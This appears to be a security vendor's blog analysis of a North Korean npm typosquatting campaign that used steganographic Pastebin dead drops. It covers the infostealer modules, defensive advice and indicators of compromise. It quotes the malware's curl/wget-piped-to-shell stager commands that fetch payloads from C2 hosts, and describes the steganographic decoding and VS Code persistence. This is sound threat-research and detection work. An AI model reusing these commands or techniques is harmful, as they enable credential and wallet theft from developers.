Inside StegaBin: How a DPRK Steganography Campaign Generated Headlines

In late February 2026, a North Korean threat actor published 26 malicious npm packages across throwaway accounts over the span of two days. The packages used text steganography to hide command-and-control URLs inside Pastebin posts disguised as computer science essays. They deployed a nine-module infostealer and RAT targeting browser credentials, crypto wallets, SSH keys, and VS Code configurations. The infrastructure spanned 31 Vercel deployments with automated fallback.

The campaign generated a wave of coverage: The Hacker News, SecurityOnline, GBHackers, DevOps.com, and others all ran stories. Socket published a detailed research blog expanding the original 17 packages to 26.

As far as we can tell, the packages saw negligible real-world adoption. That's consistent with what these campaigns typically look like in practice.

Timeline

What StegaBin actually does

Before we get to what the data tells us, the technical work here is worth understanding. The campaign, attributed to the DPRK-aligned threat group tracked as Contagious Interview (also known as FAMOUS CHOLLIMA, DeceptiveDevelopment, and PurpleBravo), represents an evolution in how npm malware resolves its C2 infrastructure.

The packages

Between February 25 and 26, 2026, 17 packages were published across individual throwaway npm accounts. Security researcher kmsec identified the initial batch; Socket later expanded the count to 26. All packages follow the same pattern: typosquats of popular libraries with plausible-sounding names.

(Full list of 26: argonist, bcryptance, bee-quarl, bubble-core, corstoken, daytonjs, ether-lint, expressjs-lint, fastify-lint, formmiderable, hapi-lint, iosysredis, jslint-config, jsnwebapptoken, kafkajs-lint, loadash-lint, mqttoken, prism-lint, promanage, sequelization, typoriem, undicy-lint, uuindex, vitetest-lint, windowston, zoddle)

Every package contains identical malicious code at vendor/scrypt-js/version.js (SHA256: da1775d0fbe99fbc35b6f0b4a3a3cb84da3ca1b2c1bbac0842317f6f804e30a4). An install script in the package's package.json triggers node ./scripts/test/install.js, which simply imports and executes this payload.

The steganography trick

This is the part that earned the campaign its name and its headlines.

Rather than hardcoding C2 domains (which are trivially blocklisted), the malware fetches three Pastebin posts containing what looks like ordinary computer science essays. Hidden inside the text are C2 URLs encoded through character-level steganography: characters at evenly-spaced positions throughout the essay have been replaced to spell out infrastructure addresses.

The decoder:

1. Strips zero-width Unicode characters from the fetched text

2. Reads a 5-digit length marker from the beginning

3. Calculates evenly-spaced character positions across the text

4. Extracts the character at each position

5. Splits the result using a ||| separator, terminating at ===END===

The three Pastebin dead drops were created on February 11, 2026, two weeks before the packages were published:

The view counts tell their own story. The primary paste was hit 353 times (likely a mix of researcher scanning and actual malware executions). The fallbacks barely registered.

Platform-specific payload delivery

The decoded C2 URL points to a Vercel deployment (ext-checkdin[.]vercel[.]app), with 31 fallback domains using patterns like cleverstack-ext301, brightlaunch-app615, neuraldock-ext126. Non-curl user agents get a "Permanently suspended" decoy page.

The Vercel endpoint serves platform-specific shell payloads:

# macOS
curl -s 'https://${c2Host}/api/m' | sh
# Drops ~/Library/tokenlinux.sh, executes via nohup

# Linux
wget -qO- 'https://${c2Host}/api/l' | sh
# Drops ~/.config/tokenlinux.npl, renames to .sh, executes via nohup

# Windows
curl -s https://${c2Host}/api/w | cmd
# Drops %APPDATA%\parse\token.cmd

All three variants run detached (spawn(shellPath, shellArgs, { stdio: 'ignore', detached: true })), leaving no console output.

The nine-module infostealer

The final payload is a modular toolkit designed to comprehensively extract credentials and secrets from a developer's machine:

The TruffleHog module is a particularly interesting choice: rather than building their own secrets scanner, the attackers download and weaponize an open-source security tool to find API keys, tokens, and credentials in the victim's codebase.

Did anyone actually install these?

All 26 packages were flagged by npm and removed. Advisories for all of them are available in the Snyk Vulnerability Database.

Based on the Pastebin view counts (353 on the primary paste, 15 and 19 on the fallbacks) and the fact that these were brand-new packages with zero prior download history, real-world adoption appears to have been negligible.

That's not surprising when you look at the campaign design. These are brand-new packages with no download history, no dependents, and no reason for any real project to include them. The names are close enough to real packages to trick someone who misremembers a package name, but expressjs-lint is not going to show up in anyone's lock file by accident. These packages reach victims through a specific social engineering workflow: a fake recruiter sends a candidate a "test project" that includes the malicious package in its dependencies. The target is individual developers during job interviews, not production systems.

A recurring pattern

The Contagious Interview campaign has been running since late 2023, part of a rising trend of malicious packages in open source ecosystems. DPRK-aligned groups have published hundreds of malicious npm packages across dozens of waves. Socket tracks these closely and has published detailed research on multiple iterations. The techniques evolve (Bitbucket payloads, then direct stagers, then Google Drive, now steganographic Pastebin dead drops), but the fundamental approach is the same: publish new throwaway packages, use them in targeted social engineering, and hope the target installs them.

Each wave generates a fresh round of headlines, and each time, the real-world enterprise impact is negligible. Nobody's package-lock.json is pulling in zoddle or daytonjs. The attack vector is social engineering aimed at individual developers, and the packages are the delivery mechanism, not the infiltration point.

When malicious packages do matter

The malicious package campaigns that warrant incident response are the ones that compromise packages already in your dependency tree.

In September 2025, the Shai-Hulud worm spread through trojanized versions of ngx-bootstrap, ng2-file-upload, and @ctrl/tinycolor, packages with real download numbers and real dependents. That campaign injected malicious postinstall hooks into legitimate packages, harvesting npm, GitHub, and cloud credentials from developer machines and CI agents. By November, its successor SHA1-Hulud had impacted over 600 distinct npm packages, including popular packages from Zapier, PostHog, and Postman.

Play Video: YouTube Video: gx5RzKrXtxQ

Shai-Hulud NPM Attack: Remediation with Snyk

For a deeper look at how legitimate package compromises work, see the Compromise of legitimate package lesson on Snyk Learn.

What this means for your security program

For most organizations, the practical risk from throwaway malicious package campaigns is low. Here's what helps:

1. Know what's in your dependency tree. If you can answer "do we use any of these 26 packages?" in minutes rather than days, you're in a good position. Tools like Snyk Open Source flag malicious packages as part of every scan, so once advisories are published, affected projects surface automatically.

# Scan your project (includes malicious package advisories)
snyk test

2. Lock your dependencies. Use lock files (package-lock.json, yarn.lock) and review changes to them in pull requests. Throwaway malicious packages only enter your codebase if someone explicitly adds them. A lock file diff showing a new, unknown package is a clear signal.

3. Focus incident response on what reaches production. When a malicious package campaign makes headlines, the first question to answer is: "Are any of these in our projects?" If the answer is no, acknowledge the threat, confirm you're not affected, and move on. Save the deep investigation for cases where compromised packages are already in your dependency tree.

4. Educate developers about recruitment-based social engineering. The Contagious Interview campaign targets developers directly through fake job interviews and "assessment projects." The technical sophistication is in the malware, but the initial access is old-school social engineering. Developers should be cautious about running unfamiliar projects from recruiters, especially those that require npm install with packages they don't recognize.

For more on securing your npm dependencies, see NPM Security: Preventing Supply Chain Attacks and How to Prevent Malicious Packages on the Snyk blog.

IOCs

For detection teams, the key indicators from this campaign. Full IOC sets are also maintained by starmtp/IOCs, kraven-security/hunting-packages, and stamparm/maltrail on GitHub.

File hashes (SHA256):

# Main payload (vendor/scrypt-js/version.js) - identical across all 26 packages
da1775d0fbe99fbc35b6f0b4a3a3cb84da3ca1b2c1bbac0842317f6f804e30a4

# Platform-specific payloads
869c327b8dc757fa126cd281bc4a14d809c50e9a792954442c55cea5b46912ec  # Linux
bce0da6547ae74f97e2bb61672a3e159b837acf01f7c68a813ea75c3835ff303  # macOS
e361d2859ba2eb2540bf6fb12db0b9857ef610bb9920830921e986d4b9109e89  # Windows
accf04ad3228a22532d2f5802a5b0c379c3616564c4766fc1f1ca20dac8dba07  # Decoy "Permanently suspended" page

# Additional package/component hashes
ddbb527be0f40cd13eab08e3e418e36e86e4f1f1458cf84cfee29490beacf3a6
ce80100a383730822221f3ce769ea5ccda0c583654cc7c119ecc50bfbb4203b9
714f890308d2cfebb2ed3ae873697408372639260bb682ea4cfbfffec98b8add
1b15f73054350c6ab42f6e1d2ce4d84d7c56821db699e4ec484541263dfcb636
ba3e520b9727e893cf07b0c1a6e6ce1a62e8e9bf28b5c771af4fdf01f9bd9ed4
78c8b9044f6029280d28a1f62a4414a22e870fc27e3cc4894bd077d17f2ad8b4
4e6a7bf3964fc0e3a655f062330c76b4876dcfac47d213e4c1f0ec3fe6ef9e12
978e8f161da04e00117a695aa59452dce89b5247db93ab7cedcaea3c1f26b8c8

Network indicators:

# C2 infrastructure
103.106.67[.]63:1244    # RAT command channel
103.106.67[.]63:1245    # Additional RAT port
103.106.67[.]63:1247    # WebSocket persistence

# Pastebin dead drops (steganographic C2 resolvers)
hxxps://pastebin[.]com/CJ5PrtNk
hxxps://pastebin[.]com/0ec7i68M
hxxps://pastebin[.]com/DjDCxcsT

# Primary Vercel C2
ext-checkdin[.]vercel[.]app

# Vercel fallback domains (30 additional)
cleverstack-ext301[.]vercel[.]app    cleverstack-app998[.]vercel[.]app
brightlaunch-ext742[.]vercel[.]app   brightlaunch-app615[.]vercel[.]app
primevector-ext483[.]vercel[.]app    primevector-app920[.]vercel[.]app
zenithflow-ext156[.]vercel[.]app     zenithflow-app877[.]vercel[.]app
cloudharbor-ext664[.]vercel[.]app    cloudharbor-app239[.]vercel[.]app
sparkforge-ext518[.]vercel[.]app     sparkforge-app790[.]vercel[.]app
logicfield-ext432[.]vercel[.]app     logicfield-app681[.]vercel[.]app
atlasnode-ext957[.]vercel[.]app      atlasnode-app204[.]vercel[.]app
signalbase-ext369[.]vercel[.]app     signalbase-app845[.]vercel[.]app
neuraldock-ext126[.]vercel[.]app     neuraldock-app734[.]vercel[.]app
orbitstack-ext592[.]vercel[.]app     orbitstack-app318[.]vercel[.]app
fusionlayer-ext807[.]vercel[.]app    fusionlayer-app463[.]vercel[.]app
quantapath-ext275[.]vercel[.]app     quantapath-app914[.]vercel[.]app
visiondock-ext648[.]vercel[.]app     visiondock-app157[.]vercel[.]app
openmatrix-ext539[.]vercel[.]app     openmatrix-app882[.]vercel[.]app

Host indicators:

• ~/Library/tokenlinux.sh (macOS)

• ~/.config/tokenlinux.npl (Linux)

• %APPDATA%\parse\token.cmd (Windows)

• Modified .vscode/tasks.json with 186-space whitespace padding (VS Code persistence via runOn: "folderOpen" trigger)

Process behavior:

• Node.js spawning curl or wget

• Node.js DNS lookups to pastebin.com

• curl/wget user-agent requests to Vercel deployments

• TruffleHog binary execution from non-standard paths